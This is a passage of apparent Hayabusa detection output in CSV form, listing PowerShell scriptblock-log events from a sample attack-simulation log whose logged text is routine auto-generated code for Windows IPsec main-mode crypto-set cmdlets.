[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] 
${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } 
} catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } 
} } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') 